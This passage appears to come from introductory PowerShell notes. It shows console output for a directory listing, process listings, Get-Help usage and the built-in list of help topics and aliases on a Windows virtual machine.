``` ```Powershell PS C:\> ls Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d---- 7/13/2009 7:37 PM PerfLogs d-r-- 5/28/2017 2:21 PM Program Files d-r-- 5/28/2017 11:33 AM Users d---- 5/28/2017 2:21 PM Windows -a--- 6/10/2009 2:42 PM 24 autoexec.bat -a--- 6/10/2009 2:42 PM 10 config.sys PS C:\> ``` - ```Process Listing``` ```Powershell PS C:\> ps Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName ------- ------ ----- ----- ----- ------ -- ----------- 125 5 14936 13560 43 996 audiodg 51 3 1572 4648 46 0.02 2588 conhost 496 5 1092 2740 33 344 csrss 190 6 1060 3344 31 400 csrss 70 4 980 3584 40 0.03 300 dwm 740 23 25336 34964 169 1.34 356 explorer 0 0 0 12 0 0 Idle 41 3 1656 3488 52 0.00 332 jusched 758 13 2804 7792 36 492 lsass 152 4 1048 2684 14 500 lsm 332 10 35048 34128 167 0.43 2580 powershell 586 13 11612 7032 81 1180 SearchIndexer 234 9 4412 7440 39 484 services 29 1 260 712 4 268 smss 302 10 4384 8316 58 1332 spoolsv 150 4 1844 6540 29 1516 sppsvc 358 7 2516 6156 35 608 svchost 261 8 2064 4760 26 720 svchost 506 12 13364 13024 74 772 svchost 563 14 18352 25724 86 892 svchost 1014 29 13012 21836 102 932 svchost 534 19 6176 10936 52 1100 svchost 421 14 7660 9644 56 1228 svchost 328 26 7852 9072 42 1368 svchost 377 17 5236 10136 69 1460 svchost 101 7 1096 3828 25 1820 svchost 352 39 7232 9140 63 2364 svchost 534 0 44 540 2 4 System 153 8 2120 4836 40 0.03 2028 taskhost 117 5 1428 3924 44 668 VBoxService 143 6 1320 4740 62 0.04 1612 VBoxTray 89 6 952 3200 33 392 wininit 120 5 1600 4468 39 440 winlogon 113 4 1796 4452 27 2524 WmiPrvSE 469 16 7412 19308 108 2088 wmpnetwk PS C:\> ``` - ```Powershell help system``` ```Powershell PS C:\> Get-Help TOPIC Get-Help SHORT DESCRIPTION Displays help about Windows PowerShell cmdlets and concepts. LONG DESCRIPTION SYNTAX get-help { | } help { | } -? "Get-help" and "-?" display help on one page. "Help" displays help on multiple pages. Examples: get-help get-process : Displays help about the Get-Process cmdlet. get-help about_signing : Displays help about signing scripts. help where-object : Displays help about the Where-Object cmdlet. help about_foreach : Displays help about foreach loops in PowerShell. set-service -? : Displays help about the Set-Service cmdlet. You can use wildcard characters in the help commands (not with -?). If multiple help topics match, PowerShell displays a list of matching topics. If only one help topic matches, PowerShell displays the topic. Examples: get-help * : Displays all help topics. get-help get-* : Displays topics that begin with get-. help *object* : Displays topics with "object" in the name. get-help about* : Displays all conceptual topics. For information about wildcards, type: get-help about_wildcard REMARKS To learn about Windows PowerShell, read the following help topics: get-command : Gets information about cmdlets from the cmdlet code. get-member : Gets the properties and methods of an object. where-object : Filters object properties. about_object : Explains the use of objects in Windows PowerShell. about_remote : Tells how to run commands on remote computers. Conceptual help files are named "about_", such as: about_regular_expression. The names of conceptual help files must be entered in English even on non-English versions of Windows PowerShell. The help commands also display the aliases of the cmdlets. These are alternate names or nicknames that are often easier to type. For example, the alias for the Invoke-Command cmdlet is "remote". To get the aliases, type: get-alias PS C:\> ``` - Get all ```powershell help topics``` ```Powershell PS C:\> Get-Help * Name Category Synopsis ---- -------- -------- ac Alias Add-Content asnp Alias Add-PSSnapin clc Alias Clear-Content cli Alias Clear-Item clp Alias Clear-ItemProperty clv Alias Clear-Variable compare Alias Compare-Object cpi Alias Copy-Item cpp Alias Copy-ItemProperty cvpa Alias Convert-Path dbp Alias Disable-PSBreakpoint diff Alias Compare-Object ebp Alias Enable-PSBreakpoint epal Alias Export-Alias epcsv Alias Export-Csv fc Alias Format-Custom fl Alias Format-List foreach Alias ForEach-Object % Alias ForEach-Object ft Alias Format-Table fw Alias Format-Wide gal Alias Get-Alias gbp Alias Get-PSBreakpoint gc Alias Get-Content gci Alias Get-ChildItem gcm Alias Get-Command gdr Alias Get-PSDrive gcs Alias Get-PSCallStack ghy Alias Get-History gi Alias Get-Item gl Alias Get-Location gm Alias Get-Member gmo Alias Get-Module gp Alias Get-ItemProperty gps Alias Get-Process group Alias Group-Object gsv Alias Get-Service gsnp Alias Get-PSSnapin gu Alias Get-Unique gv Alias Get-Variable gwmi Alias Get-WmiObject iex Alias Invoke-Expression ihy Alias Invoke-History ii Alias Invoke-Item ipmo Alias Import-Module iwmi Alias Invoke-WmiMethod ipal Alias Import-Alias ipcsv Alias Import-Csv measure Alias Measure-Object mi Alias Move-Item mp Alias Move-ItemProperty nal Alias New-Alias ndr Alias New-PSDrive ni Alias New-Item nv Alias New-Variable nmo Alias New-Module oh Alias Out-Host ogv Alias Out-GridView ise Alias powershell_ise.exe rbp Alias Remove-PSBreakpoint rdr Alias Remove-PSDrive ri Alias Remove-Item rni Alias Rename-Item rnp Alias Rename-ItemProperty rp Alias Remove-ItemProperty rmo Alias Remove-Module rsnp Alias Remove-PSSnapin rv Alias Remove-Variable rwmi Alias Remove-WmiObject rvpa Alias Resolve-Path sal Alias Set-Alias sasv Alias Start-Service sbp Alias Set-PSBreakpoint sc Alias Set-Content select Alias Select-Object si Alias Set-Item sl Alias Set-Location swmi Alias Set-WmiInstance sleep Alias Start-Sleep sort Alias Sort-Object sp Alias Set-ItemProperty saps Alias Start-Process start Alias Start-Process spps Alias Stop-Process spsv Alias Stop-Service sv Alias Set-Variable tee Alias Tee-Object where Alias Where-Object ? Alias Where-Object write Alias Write-Output cat Alias Get-Content cd Alias Set-Location clear Alias Clear-Host cp Alias Copy-Item h Alias Get-History history Alias Get-History kill Alias Stop-Process lp Alias Out-Printer ls Alias Get-ChildItem man Alias help mount Alias New-PSDrive md Alias mkdir mv Alias Move-Item popd Alias Pop-Location ps Alias Get-Process pushd Alias Push-Location pwd Alias Get-Location r Alias Invoke-History rm Alias Remove-Item rmdir Alias Remove-Item echo Alias Write-Output cls Alias Clear-Host chdir Alias Set-Location copy Alias Copy-Item del Alias Remove-Item dir Alias Get-ChildItem erase Alias Remove-Item move Alias Move-Item rd Alias Remove-Item ren Alias Rename-Item set Alias Set-Variable type Alias Get-Content icm Alias Invoke-Command clhy Alias Clear-History gjb Alias Get-Job rcjb Alias Receive-Job rjb Alias Remove-Job sajb Alias Start-Job spjb Alias Stop-Job wjb Alias Wait-Job nsn Alias New-PSSession gsn Alias Get-PSSession rsn Alias Remove-PSSession ipsn Alias Import-PSSession epsn Alias Export-PSSession etsn Alias Enter-PSSession exsn Alias Exit-PSSession Get-WinEvent Cmdlet Gets events from event logs and event tracing log files on local and rem... Get-Counter Cmdlet Gets performance counter data from local and remote computers. Import-Counter Cmdlet Imports performance counter log files (.blg, .csv, .tsv) and creates the... Export-Counter Cmdlet The Export-Counter cmdlet takes PerformanceCounterSampleSet objects and ... Disable-WSManCredSSP Cmdlet Disables Credential Security Service Provider (CredSSP) authentication o... Enable-WSManCredSSP Cmdlet Enables Credential Security Service Provider (CredSSP) authentication on... Get-WSManCredSSP Cmdlet Gets the Credential Security Service Provider-related configuration for ... Set-WSManQuickConfig Cmdlet Configures the local computer for remote management. Test-WSMan Cmdlet Tests whether the WinRM service is running on a local or remote computer. Invoke-WSManAction Cmdlet Invokes an action on the object that is specified by the Resource URI an... Connect-WSMan Cmdlet Connects to the WinRM service on a remote computer. Disconnect-WSMan Cmdlet Disconnects the client from the WinRM service on a remote computer. Get-WSManInstance Cmdlet Displays management information for a resource instance specified by a R... Set-WSManInstance Cmdlet Modifies the management information that is related to a resource. Remove-WSManInstance Cmdlet Deletes a management resource instance. New-WSManInstance Cmdlet Creates a new instance of a management resource. New-WSManSessionOption Cmdlet Creates a WS-Management session option hash table to use as input parame... Get-Command Cmdlet Gets basic information about cmdlets and other elements of Windows Power... Get-Help Cmdlet Displays information about Windows PowerShell commands and concepts. Get-History Cmdlet Gets a list of the commands entered during the current session. Invoke-History Cmdlet Runs commands from the session history. Add-History Cmdlet Appends entries to the session history. Clear-History Cmdlet Deletes entries from the command history. Register-PSSessionConfiguration Cmdlet Creates and registers a new session configuration. Unregister-PSSessionConfiguration Cmdlet Deletes registered session configurations from the computer. Get-PSSessionConfiguration Cmdlet Gets the registered session configurations on the computer. Set-PSSessionConfiguration Cmdlet Changes the properties of a registered session configuration. Enable-PSSessionConfiguration Cmdlet Enables the session configurations on the local computer. Disable-PSSessionConfiguration Cmdlet Denies access to the session configurations on the local computer. Enable-PSRemoting Cmdlet Configures the computer to receive remote commands. Invoke-Command Cmdlet Runs commands on local and remote computers. New-PSSession Cmdlet Creates a persistent connection to a local or remote computer. Get-PSSession Cmdlet Gets the Windows PowerShell sessions (PSSessions) in the current session. Remove-PSSession Cmdlet Closes one or more Windows PowerShell sessions (PSSessions). Start-Job Cmdlet Starts a Windows PowerShell background job. Get-Job Cmdlet Gets Windows PowerShell background jobs that are running in the current ... Receive-Job Cmdlet Gets the results of the Windows PowerShell background jobs in the curren... Stop-Job Cmdlet Stops a Windows PowerShell background job. Wait-Job Cmdlet Suppresses the command prompt until one or all of the Windows PowerShell... Remove-Job Cmdlet Deletes a Windows PowerShell background job. Enter-PSSession Cmdlet Starts an interactive session with a remote computer. Exit-PSSession Cmdlet Ends an interactive session with a remote computer. New-PSSessionOption Cmdlet Creates an object that contains advanced options for a PSSession. ForEach-Object Cmdlet Performs an operation against each of a set of input objects. Where-Object Cmdlet Creates a filter that controls which objects will be passed along a comm... Set-PSDebug Cmdlet Turns script debugging features on and off, sets the trace level, and to... Set-StrictMode Cmdlet Establishes and enforces coding rules in expressions, scripts, and scrip... New-Module Cmdlet Creates a new dynamic module that exists only in memory. Import-Module Cmdlet Adds modules to the current session. Export-ModuleMember Cmdlet Specifies the module members that are exported. Get-Module Cmdlet Gets the modules that have been imported or that can be imported into th... Remove-Module Cmdlet Removes modules from the current session. New-ModuleManifest Cmdlet Creates a new module manifest. Test-ModuleManifest Cmdlet Verifies that a module manifest file accurately describes the contents o... Add-PSSnapin Cmdlet Adds one or more Windows PowerShell snap-ins to the current session. Remove-PSSnapin Cmdlet Removes Windows PowerShell snap-ins from the current session. Get-PSSnapin Cmdlet Gets the Windows PowerShell snap-ins on the computer. Export-Console Cmdlet Exports the names of snap-ins in the current session to a console file. Format-List Cmdlet Formats the output as a list of properties in which each property appear... Format-Custom Cmdlet Uses a customized view to format the output. Format-Table Cmdlet Formats the output as a table. Format-Wide Cmdlet Formats objects as a wide table that displays only one property of each ... Out-Null Cmdlet Deletes output instead of sending it to the console. Out-Default Cmdlet Sends the output to the default formatter and to the default output cmdlet. Out-Host Cmdlet Sends output to the command line. Out-File Cmdlet Sends output to a file. Out-Printer Cmdlet Sends output to a printer. Out-String Cmdlet Sends objects to the host as a series of strings. Out-GridView Cmdlet Sends output to an interactive table in a separate window. Get-FormatData Cmdlet Gets the formatting data in the current session. Export-FormatData Cmdlet Saves formatting data from the current session in a formatting file. Register-ObjectEvent Cmdlet Subscribes to the events that are generated by a Microsoft .NET Framewor... Register-EngineEvent Cmdlet Subscribes to events that are generated by the Windows PowerShell engine... Wait-Event Cmdlet Waits until a particular event is raised before continuing to run. Get-Event Cmdlet Gets the events in the event queue. Remove-Event Cmdlet Deletes events from the event queue. Get-EventSubscriber Cmdlet Gets the event subscribers in the current session. Unregister-Event Cmdlet Cancels an event subscription. New-Event Cmdlet Creates a new event. Add-Member Cmdlet Adds a user-defined custom member to an instance of a Windows PowerShell... Add-Type Cmdlet Adds a Microsoft .NET Framework type (a class) to a Windows PowerShell s... Compare-Object Cmdlet Compares two sets of objects. ConvertTo-Html Cmdlet Converts Microsoft .NET Framework objects into HTML that can be displaye... ConvertFrom-StringData Cmdlet Converts a string containing one or more key/value pairs to a hash table. Export-CSV Cmdlet Converts Microsoft .NET Framework objects into a series of comma-separat... Import-CSV Cmdlet Converts object properties in a comma-separated value (CSV) file into CS... ConvertTo-CSV Cmdlet Converts Microsoft .NET Framework objects into a series of comma-separat... ConvertFrom-CSV Cmdlet Converts object properties in comma-separated value (CSV) format into CS... Export-Alias Cmdlet Exports information about currently defined aliases to a file. Invoke-Expression Cmdlet Runs commands or expressions on the local computer. Get-Alias Cmdlet Gets the aliases for the current session. Get-Culture Cmdlet Gets the current culture set in the operating system. Get-Date Cmdlet Gets the current date and time. Get-Host Cmdlet Gets an object that represents the current host program. And, displays W... Get-Member Cmdlet Gets the properties and methods of objects. Get-Random Cmdlet Gets a random number, or selects objects randomly from a collection. Get-UICulture Cmdlet Gets the current user interface (UI) culture settings in the operating s... Get-Unique Cmdlet Returns the unique items from a sorted list. Export-PSSession Cmdlet Imports commands from another session and saves them in a Windows PowerS... Import-PSSession Cmdlet Imports commands from another session into the current session. Import-Alias Cmdlet Imports an alias list from a file. Import-LocalizedData Cmdlet Imports language-specific data into scripts and functions based on the U... Select-String Cmdlet Finds text in strings and files. Measure-Object Cmdlet Calculates the numeric properties of objects, and the characters, words,... New-Alias Cmdlet Creates a new alias. New-TimeSpan Cmdlet Creates a TimeSpan object. Read-Host Cmdlet Reads a line of input from the console. Set-Alias Cmdlet Creates or changes an alias (alternate name) for a cmdlet or other comma... Set-Date Cmdlet Changes the system time on the computer to a time that you specify. Start-Sleep Cmdlet Suspends the activity in a script or session for the specified period of... Tee-Object Cmdlet Saves command output in a file or variable, and displays it in the console. Measure-Command Cmdlet Measures the time it takes to run script blocks and cmdlets. Update-List Cmdlet Adds items to and removes items from a property value that contains a co... Update-TypeData Cmdlet Updates the current extended type configuration by reloading the *.types... Update-FormatData Cmdlet Updates the formatting data in the current session. Write-Host Cmdlet Writes customized output to a host. Write-Progress Cmdlet Displays a progress bar within a Windows PowerShell command window. New-Object Cmdlet Creates an instance of a Microsoft .NET Framework or COM object. Select-Object Cmdlet Selects specified properties of an object or set of objects. It can also... Group-Object Cmdlet Groups objects that contain the same value for specified properties. Sort-Object Cmdlet Sorts objects by property values. Get-Variable Cmdlet Gets the variables in the current console. New-Variable Cmdlet Creates a new variable. Set-Variable Cmdlet Sets the value of a variable. Creates the variable if one with the reque... Remove-Variable Cmdlet Deletes a variable and its value. Clear-Variable Cmdlet Deletes the value of a variable. Export-Clixml Cmdlet Creates an XML-based representation of an object or objects and stores i... Import-Clixml Cmdlet Imports a CLIXML file and creates corresponding objects within Windows P... ConvertTo-XML Cmdlet Creates an XML-based representation of an object. Select-XML Cmdlet Finds text in an XML string or document. Write-Debug Cmdlet Writes a debug message to the console. Write-Verbose Cmdlet Writes text to the verbose message stream. Write-Warning Cmdlet Writes a warning message. Write-Error Cmdlet Writes an object to the error stream. Write-Output Cmdlet Sends the specified objects to the next command in the pipeline. If the ... Set-PSBreakpoint Cmdlet Sets a breakpoint on a line, command, or variable. Get-PSBreakpoint Cmdlet Gets the breakpoints that are set in the current session. Remove-PSBreakpoint Cmdlet Deletes breakpoints from the current console. Enable-PSBreakpoint Cmdlet Enables the breakpoints in the current console. Disable-PSBreakpoint Cmdlet Disables the breakpoints in the current console. Get-PSCallStack Cmdlet Displays the current call stack. Send-MailMessage Cmdlet Sends an e-mail message. Get-TraceSource Cmdlet Gets the Windows PowerShell components that are instrumented for tracing. Set-TraceSource Cmdlet Configures, starts, and stops a trace of Windows PowerShell components. Trace-Command Cmdlet Configures and starts a trace of the specified expression or command. Start-Transcript Cmdlet Creates a record of all or part of a Windows PowerShell session in a tex... Stop-Transcript Cmdlet Stops a transcript. Add-Content Cmdlet Adds content to the specified items, such as adding words to a file. Clear-Content Cmdlet Deletes the contents of an item, such as deleting the text from a file, ... Clear-ItemProperty Cmdlet Deletes the value of a property but does not delete the property. Join-Path Cmdlet Combines a path and a child path into a single path. The provider suppli... Convert-Path Cmdlet Converts a path from a Windows PowerShell path to a Windows PowerShell p... Copy-ItemProperty Cmdlet Copies a property and value from a specified location to another location. Get-EventLog Cmdlet Gets the events in an event log, or a list of the event logs, on the loc... Clear-EventLog Cmdlet Deletes all entries from specified event logs on the local or remote com... Write-EventLog Cmdlet Writes an event to an event log. Limit-EventLog Cmdlet Sets the event log properties that limit the size of the event log and t... Show-EventLog Cmdlet Displays the event logs of the local or a remote computer in Event Viewer. New-EventLog Cmdlet Creates a new event log and a new event source on a local or remote comp... Remove-EventLog Cmdlet Deletes an event log or unregisters an event source. Get-ChildItem Cmdlet Gets the items and child items in one or more specified locations. Get-Content Cmdlet Gets the content of the item at the specified location. Get-ItemProperty Cmdlet Gets the properties of a specified item. Get-WmiObject Cmdlet Gets instances of Windows Management Instrumentation (WMI) classes or in... Invoke-WmiMethod Cmdlet Calls Windows Management Instrumentation (WMI) methods. Move-ItemProperty Cmdlet Moves a property from one location to another. Get-Location Cmdlet Gets information about the current working location. Set-Location Cmdlet Sets the current working location to a specified location. Push-Location Cmdlet Adds the current location to the top of a list of locations (a "stack"). Pop-Location Cmdlet Changes the current location to the location most recently pushed onto t... New-PSDrive Cmdlet Creates a Windows PowerShell drive in the current session. Remove-PSDrive Cmdlet Removes a Windows PowerShell drive from its location. Get-PSDrive Cmdlet Gets the Windows PowerShell drives in the current session. Get-Item Cmdlet Gets the item at the specified location. New-Item Cmdlet Creates a new item. Set-Item Cmdlet Changes the value of an item to the value specified in the command. Remove-Item Cmdlet Deletes the specified items. Move-Item Cmdlet Moves an item from one location to another. Rename-Item Cmdlet Renames an item in a Windows PowerShell provider namespace. Copy-Item Cmdlet Copies an item from one location to another within a namespace. Clear-Item Cmdlet Deletes the contents of an item, but does not delete the item. Invoke-Item Cmdlet Performs the default action on the specified item. Get-PSProvider Cmdlet Gets information about the specified Windows PowerShell provider. New-ItemProperty Cmdlet Creates a new property for an item and sets its value. For example, you ... Split-Path Cmdlet Returns the specified part of a path. Test-Path Cmdlet Determines whether all elements of a path exist. Get-Process Cmdlet Gets the processes that are running on the local computer or a remote co... Stop-Process Cmdlet Stops one or more running processes. Wait-Process Cmdlet Waits for the processes to be stopped before accepting more input. Debug-Process Cmdlet Debugs one or more processes running on the local computer. Start-Process Cmdlet Starts one or more processes on the local computer. Remove-ItemProperty Cmdlet Deletes the property and its value from an item. Remove-WmiObject Cmdlet Deletes an instance of an existing Windows Management Instrumentation (W... Rename-ItemProperty Cmdlet Renames a property of an item. Register-WmiEvent Cmdlet Subscribes to a Windows Management Instrumentation (WMI) event. Resolve-Path Cmdlet Resolves the wildcard characters in a path, and displays the path contents. Get-Service Cmdlet Gets the services on a local or remote computer. Stop-Service Cmdlet Stops one or more running services. Start-Service Cmdlet Starts one or more stopped services. Suspend-Service Cmdlet Suspends (pauses) one or more running services. Resume-Service Cmdlet Resumes one or more suspended (paused) services. Restart-Service Cmdlet Stops and then starts one or more services. Set-Service Cmdlet Starts, stops, and suspends a service, and changes its properties. New-Service Cmdlet Creates a new Windows service. Set-Content Cmdlet Writes or replaces the content in an item with new content. Set-ItemProperty Cmdlet Creates or changes the value of a property of an item. Set-WmiInstance Cmdlet Creates or updates an instance of an existing Windows Management Instrum... Get-Transaction Cmdlet Gets the current (active) transaction. Start-Transaction Cmdlet Starts a transaction. Complete-Transaction Cmdlet Commits the active transaction. Undo-Transaction Cmdlet Rolls back the active transaction. Use-Transaction Cmdlet Adds the script block to the active transaction. New-WebServiceProxy Cmdlet Creates a Web service proxy object that lets you use and manage the Web ... Get-HotFix Cmdlet Gets the hotfixes that have been applied to the local and remote computers. Test-Connection Cmdlet Sends ICMP echo request packets ("pings") to one or more computers. Enable-ComputerRestore Cmdlet Enables the System Restore feature on the specified file system drive. Disable-ComputerRestore Cmdlet Disables the System Restore feature on the specified file system drive. Checkpoint-Computer Cmdlet Creates a system restore point on the local computer. Get-ComputerRestorePoint Cmdlet Gets the restore points on the local computer. Restart-Computer Cmdlet Restarts ("reboots") the operating system on local and remote computers. Stop-Computer Cmdlet Stops (shuts down) local and remote computers. Restore-Computer Cmdlet Starts a system restore on the local computer. Add-Computer Cmdlet Add the local computer to a domain or workgroup. Remove-Computer Cmdlet Remove the local computer from a workgroup or domain. Test-ComputerSecureChannel Cmdlet Tests and repairs the secure channel between the local computer and its ... Reset-ComputerMachinePassword Cmdlet Resets the machine account password for the computer. Get-Acl Cmdlet Gets the security descriptor for a resource, such as a file or registry ... Set-Acl Cmdlet Changes the security descriptor of a specified resource, such as a file ... Get-PfxCertificate Cmdlet Gets information about .pfx certificate files on the computer. Get-Credential Cmdlet Gets a credential object based on a user name and password. Get-ExecutionPolicy Cmdlet Gets the execution policies for the current session. Set-ExecutionPolicy Cmdlet Changes the user preference for the Windows PowerShell execution policy. Get-AuthenticodeSignature Cmdlet Gets information about the Authenticode signature in a file. Set-AuthenticodeSignature Cmdlet Adds an Authenticode signature to a Windows PowerShell script or other f... ConvertFrom-SecureString Cmdlet Converts a secure string into an encrypted standard string. ConvertTo-SecureString Cmdlet Converts encrypted standard strings to secure strings. It can also conve... WSMan Provider Provides access to Web Services for Management (WS-Management) configura... Alias Provider Provides access to the Windows PowerShell aliases and the values that th... Environment Provider Provides access to the Windows environment variables. FileSystem Provider Provides access to files and directories. Function Provider Provides access to the functions defined in Windows PowerShell. Registry Provider Provides access to the system registry keys and values from Windows Powe... Variable Provider Provides access to the Windows PowerShell variables and to their values. Certificate Provider Provides access to X.509 certificate stores and certificates from within... about_aliases HelpFile Describes how to use alternate names for cmdlets and commands in Windows about_Arithmetic_Operators HelpFile Describes the operators that perform arithmetic in Windows PowerShell. about_arrays HelpFile Describes a compact data structure for storing data elements. about_Assignment_Operators HelpFile Describes how to use operators to assign values to variables. about_Automatic_Variables HelpFile Describes variables that store state information for Windows PowerShell. about_Break HelpFile Describes a statement you can use to immediately exit Foreach, For, While, about_command_precedence HelpFile Describes how Windows PowerShell determines which command to run. about_Command_Syntax HelpFile Describes the notation used for Windows PowerShell syntax in Help. about_Comment_Based_Help HelpFile Describes how to write comment-based Help topics for functions and scripts. about_CommonParameters HelpFile Describes the parameters that can be used with any cmdlet. about_Comparison_Operators HelpFile Describes the operators that compare values in Windows PowerShell. about_Continue HelpFile Describes how the Continue statement immediately returns the program flow about_Core_Commands HelpFile Lists the cmdlets that are designed for use with Windows PowerShell about_data_sections HelpFile Explains Data sections, which isolate text strings and other read-only about_debuggers HelpFile Describes the Windows PowerShell debugger. about_do HelpFile Runs a statement list one or more times, subject to a While or Until about_environment_variables HelpFile Describes how to access Windows environment variables in Windows about_escape_characters HelpFile Introduces the escape character in Windows PowerShell and explains about_eventlogs HelpFile Windows PowerShell creates a Windows event log that is about_execution_policies HelpFile Describes the Windows PowerShell execution policies and explains about_For HelpFile Describes a language command you can use to run statements based on a about_Foreach HelpFile Describes a language command you can use to traverse all the items in a about_format.ps1xml HelpFile The Format.ps1xml files in Windows PowerShell define the default display about_functions HelpFile Describes how to create and use functions in Windows PowerShell. about_functions_advanced HelpFile Introduces advanced functions that act similar to cmdlets. about_functions_advanced_methods HelpFile Describes how functions that specify the CmdletBinding attribute can use about_functions_advanced_param... HelpFile Explains how to add static and dynamic parameters to functions that declare about_functions_cmdletbindinga... HelpFile Describes an attribute that declares a function that acts similar to a about_hash_tables HelpFile Describes how to create, use, and sort hash tables in Windows PowerShell. about_History HelpFile Describes how to retrieve and run commands in the command history. about_If HelpFile Describes a language command you can use to run statement lists based about_jobs HelpFile Provides information about how Windows PowerShell background jobs run a about_job_details HelpFile Provides details about background jobs on local and remote computers. about_join HelpFile Describes how the join operator (-join) combines multiple strings into a about_Language_Keywords HelpFile Describes the keywords in the Windows PowerShell scripting language. about_Line_Editing HelpFile Describes how to edit commands at the Windows PowerShell command prompt. about_locations HelpFile Describes how to access items from the working location in Windows about_logical_operators HelpFile Describes the operators that connect statements in Windows PowerShell. about_methods HelpFile Describes how to use methods to perform actions on objects in Windows about_modules HelpFile Explains how to install, import, and use Windows PowerShell modules. about_objects HelpFile Provides essential information about objects in Windows PowerShell. about_operators HelpFile Describes the operators that are supported by Windows PowerShell. about_parameters HelpFile Describes how to work with cmdlet parameters in Windows PowerShell. about_Parsing HelpFile Describes how Windows PowerShell parses commands. about_Path_Syntax HelpFile Describes the full and relative path name formats in Windows PowerShell. about_pipelines HelpFile Combining commands into pipelines in the Windows PowerShell about_preference_variables HelpFile Variables that customize the behavior of Windows PowerShell about_profiles HelpFile Describes how to create and use a Windows PowerShell profile. about_prompts HelpFile Describes the Prompt function and demonstrates how to create a custom about_properties HelpFile Describes how to use object properties in Windows PowerShell. about_providers HelpFile Describes how Windows PowerShell providers provide access to data and about_pssessions HelpFile Describes Windows PowerShell sessions (PSSessions) and explains how to about_pssession_details HelpFile Provides detailed information about Windows PowerShell sessions and the about_PSSnapins HelpFile Describes Windows PowerShell snap-ins and shows how to use and manage them. about_Quoting_Rules HelpFile Describes rules for using single and double quotation marks about_Redirection HelpFile Describes how to redirect output from Windows PowerShell to text files. about_Ref HelpFile Describes how to create and use a reference variable type. about_regular_expressions HelpFile Describes regular expressions in Windows PowerShell. about_remote HelpFile Describes how to run remote commands in Windows PowerShell. about_remote_FAQ HelpFile Contains questions and answers about running remote commands about_remote_jobs HelpFile Describes how to run background jobs on remote computers. about_remote_output HelpFile Describes how to interpret and format the output of remote commands. about_remote_requirements HelpFile Describes the system requirements and configuration requirements for about_remote_troubleshooting HelpFile Describes how to troubleshoot remote operations in Windows PowerShell. about_requires HelpFile Prevents a script from running by requiring the specified snap-ins and about_Reserved_Words HelpFile Lists the reserved words that cannot be used as identifiers because they about_Return HelpFile Exits the current scope, which can be a function, script, or script block. about_scopes HelpFile Explains the concept of scope in Windows PowerShell and shows how to set about_scripts HelpFile Describes how to write and run scripts in Windows PowerShell. about_script_blocks HelpFile Defines what a script block is and explains how to use script blocks in about_script_internationalization HelpFile Describes the script internationalization features of Windows PowerShell... about_Session_Configurations HelpFile Describes session configurations, which determine the users who can about_Signing HelpFile Explains to how sign scripts so that they comply with the Windows about_Special_Characters HelpFile Describes the special characters that you can use to control how about_split HelpFile Explains how to use the split operator to split one or more strings into about_Switch HelpFile Explains how to use a switch to handle multiple If statements. about_Throw HelpFile Describes the Throw keyword, which generates a terminating error. about_transactions HelpFile Describes how to manage transacted operations in Windows PowerShell. about_trap HelpFile Describes a keyword that handles a terminating error. about_try_catch_finally HelpFile Describes how to use the Try, Catch, and Finally blocks to handle about_types.ps1xml HelpFile Explains how the Types.ps1xml files let you extend the Microsoft .NET about_type_operators HelpFile Describes the operators that work with Microsoft .NET Framework types. about_Variables HelpFile Describes how variables store values that can be used in Windows about_While HelpFile Describes a language statement that you can use to run a command block about_wildcards HelpFile Describes how to use wildcard characters in Windows PowerShell. about_Windows_PowerShell_2.0 HelpFile Describes the new features that are included in Windows PowerShell 2.0. about_Windows_PowerShell_ISE HelpFile Describes the features and system requirements of Windows PowerShell about_WMI_Cmdlets HelpFile Provides background information about Windows Management Instrumentation about_WS-Management_Cmdlets HelpFile Provides an overview of Web Services for Management (WS-Management) as default HelpFile Displays help about Windows PowerShell cmdlets and concepts. PS C:\> ``` - Get all ```powershell``` help topics for ```process``` ```Powershell PS C:\> Get-Help *process Name Category Synopsis ---- -------- -------- Get-Process Cmdlet Gets the processes that are running on the local computer or a remote co... Stop-Process Cmdlet Stops one or more running processes. Wait-Process Cmdlet Waits for the processes to be stopped before accepting more input. Debug-Process Cmdlet Debugs one or more processes running on the local computer. Start-Process Cmdlet Starts one or more processes on the local computer. PS C:\> ``` - ```Get-Process``` Cmdlet ```Powershell PS C:\> Get-Process Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName ------- ------ ----- ----- ----- ------ -- ----------- 109 5 14812 9284 43 996 audiodg 52 3 1600 4688 46 0.44 2588 conhost 452 5 1092 2584 33 344 csrss 178 6 1080 3124 31 400 csrss 68 4 964 3080 39 0.03 300 dwm 695 21 23220 25500 166 1.38 356 explorer 0 0 0 12 0 0 Idle 41 3 1672 2980 53 0.00 332 jusched 756 13 2860 7264 35 492 lsass 144 4 1048 2540 14 500 lsm 75 4 1312 3752 31 3528 mscorsvw 413 10 81340 81328 218 1.83 2580 powershell 576 13 11580 5804 80 1180 SearchIndexer 217 7 4004 5388 35 484 services 29 1 212 628 4 268 smss 285 10 4468 6516 58 1332 spoolsv 140 4 1768 3728 28 1516 sppsvc 353 7 2460 5292 34 608 svchost 276 8 1996 4380 26 720 svchost 561 13 14644 12140 77 772 svchost 529 13 22324 29264 100 892 svchost 1239 35 20608 23608 127 932 svchost 498 17 5776 9092 50 1100 svchost 378 13 7728 8008 55 1228 svchost 318 25 8292 8060 47 1368 svchost 344 15 4952 8300 67 1460 svchost 96 7 1068 3392 25 1820 svchost 71 4 964 3560 22 2056 svchost 349 37 7504 8204 63 2364 svchost 400 34 143888 48300 208 3556 svchost 592 0 44 1416 3 4 System 146 8 2120 4372 40 0.03 2028 taskhost 327 10 8012 14516 82 3944 TrustedInstaller 115 5 1444 3524 45 668 VBoxService 139 6 1328 4308 62 0.04 1612 VBoxTray 123 5 1416 4744 28 2348 VSSVC 74 5 808 2904 32 392 wininit 111 4 1524 3668 39 440 winlogon 113 4 1712 3952 26 2524 WmiPrvSE 172 6 3152 6856 37 3820 WmiPrvSE 428 15 7364 14860 108 2088 wmpnetwk 98 5 1356 4680 45 4048 WuSetupV PS C:\> ``` - Get all ```powershell``` help topics for ```alias``` ```Powershell PS C:\> Get-Help *alias* Name Category Synopsis ---- -------- -------- Export-Alias Cmdlet Exports information about currently defined aliases to a file. Get-Alias Cmdlet Gets the aliases for the current session. Import-Alias Cmdlet Imports an alias list from a file. New-Alias Cmdlet Creates a new alias. Set-Alias Cmdlet Creates or changes an alias (alternate name) for a cmdlet or other comma... Alias Provider Provides access to the Windows PowerShell aliases and the values that th... about_aliases HelpFile Describes how to use alternate names for cmdlets and commands in Windows PS C:\> ``` - ```Get-Alias``` Cmdlet ```Powershell PS C:\> Get-Alias CommandType Name 